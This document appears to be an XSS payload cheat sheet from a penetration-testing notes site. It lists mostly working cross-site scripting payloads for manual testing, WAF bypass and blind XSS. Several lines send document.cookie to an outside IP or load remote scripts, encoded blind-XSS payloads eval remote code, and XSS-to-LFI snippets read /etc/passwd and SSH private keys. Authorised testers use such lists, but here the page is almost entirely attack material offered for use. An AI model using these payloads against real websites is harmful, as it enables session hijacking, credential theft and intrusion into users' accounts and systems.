XSS

<script>alert(1)</script>
<Script>alert(1)</Script>
<sCript>alert(document.domain)</sCript>
<script>alert(123);</script>
<script>alert("test");</script>
<script>alert(document.cookie)</script>
</script><script>alert(document.cookie)</script>
javascript:alert(document.cookie)
javascript:prompt(document.cookie)
'-alert(document.cookie)-'
</script><svg onload=alert(document.cookie)>
"onmouseover=alert(document.cookie)//
{{$on.constructor('alert(1)')()}}
<Script>alert(document.cookie)</Script>
<sCript>alert(document.domain)</sCript>
<script>alert(document.cookie);</script>
<script>alert(document.cookie);</script>
<script>alert(document.domain)</script>
<script>alert(document.cookie)</script>
<script>new Image().src="http://192.168.1.6/?c="+document.cookie;</script>
<script>var i=new Image; i.src="http://192.168.1.6/?"+document.cookie;</script>
</script><script>alert(1)</script>
<img src="abc" onerror="alert(1)">
<img src="" onerror="alert(document.cookie)">
<img src='x' onerror='alert(document.cookie)' />
&lt;img src=0 onerror=alert(&#39;1&#39;)&gt;
&lt;img src=0 onerror=alert(document.cookie)&gt;
<svg/onload=alert(1)>
"><svg onload=alert(1)>
';alert('1');'
';alert('abc');'
<sc<script>ript>alert(1)</sc</script>ript>
<BODY ONLOAD=alert('1')>
<marquee onstart=alert(1)></marquee>
<audio src/onerror=alert(1)>
<audio src/onerror=prompt(123)>
<audio src/onerror=confirm(123)>
<script src="http://192.168.1.6/test.js" ></script>
<body onload=alert(123) >
<body onload=confirm(123) >
<body onload=prompt(123) >
--><svg/onload=alert(document.domain)>
--><body onload=alert(123) >
--><script>alert(1)</script>
--><img src=x onerror=alert(Gotcha)>
<iframe src='https://testforiframe.site/'>
"><iframe src='https://testforiframe.site/'>
"><script src="https://ee.xss.ht/"></script>
"><script>alert(document.domain)</script>
"><script>alert(document.domain + '\n' + "1")</script>
"><script>alert(document.domain + '\n' + "Name")</script>
"<img src='x' onerror='alert(10)' />"
https://brutelogic.com.br/poc.svg
http://xss.rocks/scriptlet.html
javascript:alert(document.cookie)
poc.svg = <svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)"/>
"><script>alert(1)</script>
'or<script>alert(1)</script>
'or<img src=0 onerror=alert('1')>
<script <script>>alert('Gotcha')</script>
<audio src/onerror=alert('Gotcha')>
<iframe src=javascript:alert('Gotcha')>
<iframe src="javascript:alert(Gotcha)">
<img src=x onerror=alert(Gotcha)>
';alert(gotcha); //
<body onmouseover="print()">
<body onclick=print()>
<body onmessage=print()>
<iframe onload=print()></iframe>
<SCRIPT SRC=http://xss.rocks/xss.js></SCRIPT>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG SRC=javascript:alert(&quot;XSS&quot;)>
<IMG """><SCRIPT>alert(document.cookie)</SCRIPT>"\>
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img>
<img src=x onerror="&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041">
<<SCRIPT>alert(document.cookie);//\<</SCRIPT>>
<iframe src=http://xss.rocks/scriptlet.html <
</script><script>alert(document.cookie);</script>
</TITLE><SCRIPT>alert(document.cookie);</SCRIPT>
<BODY ONLOAD=alert(document.cookie)>
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>
<OBJECT TYPE="text/x-scriptlet" DATA="http://xss.rocks/scriptlet.html"></OBJECT>
<script>'-alert(1)-'</script>
'-alert(1)-'
></select><img%20src=1%20onerror=alert(1)>
{{$on.constructor('alert(1)')()}}
\"-alert(1)}//
<img src=1 onerror=print()>
"-top['al\x65rt']('sailay')-"
<pre id=p style=background:#000><svg onload='setInterval(n=>{for(o=t++,i=476;i--;o+=i%30?("0o"[c=0|(h=v=>(M=Math).hypot(i/30-8+3*M.sin(t/8/v),i%30/2-7+4*M.cos(t/9/v)))(7)*h(9)*h(6)/32]||".").fontcolor(c>2):"\n");p.innerHTML=o},t=1)'>
<img src="" onerror="innerHTML=decodeURIComponent.call`${location.hash}`" "="">
<img src="" onerror="location=/javascript:/.source+location" "="">
<img src="" onerror="window.onerror=alert;throw 1337" "="">
<img src="" onerror="alert&1par;1337&rpar;" "="">
<img src="" onerror="alert`1337`" "="">
javascript:alert(document.cookie)
"><img src=x onerror=alert(document.domain)>
"><script>alert(1)</script>
"><script>alert(document.domain)</script>
"><script>alert(document.cookie)</script>
"><script>prompt(1)</script>
"><script>prompt(document.domain)</script>
"><script>prompt(document.cookie)</script>
"><svg><script>alert(1)</script>
?s="onerror="innerHTML=decodeURIComponet.call`${location.hash}`"#<img src onerror=alert(1337)>
?s="onerror="location=/javascript:/.source%2Blocation"&a=%0A+alert(1337)
?s="onerror="window.onerror=alert;throw 1337"
?s="onerror="alert%261par;1337%26rpar;"
?s="onerror="alert`1337`"
<img src="xxx" onerror="document.write('\<iframe src=file:///etc/passwd>\</iframe>')"/>
<link rel=attachment href="file:///etc/passwd">
<iframe src="http://attacker-ip/test.php?file=/etc/passwd">\</iframe>
<IMG sRC=X onerror=jaVaScRipT:alert`xss`>
%22%3E%3CIMG%20sRC=X%20onerror=jaVaScRipT:alert`xss`%3E
<svg  xmlns="http://www.w3.org/2000/svg" onload="alert(document.cookie)"/>
<svg><style> <script>alert(1)</script> </style></svg>
<math><style> <img src onerror=alert(2)> </style></math>

XSS list for manual testing (main cases, high success rate).

"><img src onerror=alert(1)>
"autofocus onfocus=alert(1)//
</script><script>alert(1)</script>
'-alert(1)-'
\'-alert(1)//
javascript:alert(1)

Try it on:

  • URL query, fragment & path;

  • all input fields.

A nice way to store the payload

"><script>eval(new URL(document.location.href+"#javascript:confirm(69)").hash.slice(1))</script>

A payload to bypass Akamai WAF

<A href="javascrip%09t&colon;eval.apply${[jj.className+(23)]}" id=jj class=alert>Click Here

Another one

"><img/src/style=html:url("data:,"><svg/onload=confirm(69)>")>

BlindXSS-Payloads: #Max Payload 5-7

  - '"><img src=x id=dmFyIGE9ZG9jdW1lbnQuY3Jgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vamVycnkuYnhzm9keS5hcHBlbmRDaGlsZChhKTs=&#61 onerror=eval(atob(this.id))>'
  - "'><img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS57ZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChhKTs=&#61 onerror=eval(atob(this.id))>"

xss to lfi payload -

  1. x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText)};x.open(‘GET’,’file:///etc/hosts’);x.send();

  2. x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText)};x.open(‘GET’,’file:///etc/passwd’);x.send();

  3. get ssh private key -x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText)};x.open("GET","file:///home/reader/.ssh/id_rsa");x.send();

[Pinging the server down]

<script>
    let time = 500;
    setInterval(()=>{
        let img = document.createElement("img");
        img.src = https://attacker.com/ping?time=${time}ms;
        time += 500;
    }, 500);
</script>
<img src="https://attacker.com/delay">
PreviousXSS Cheat SheetNextXSS -

Last updated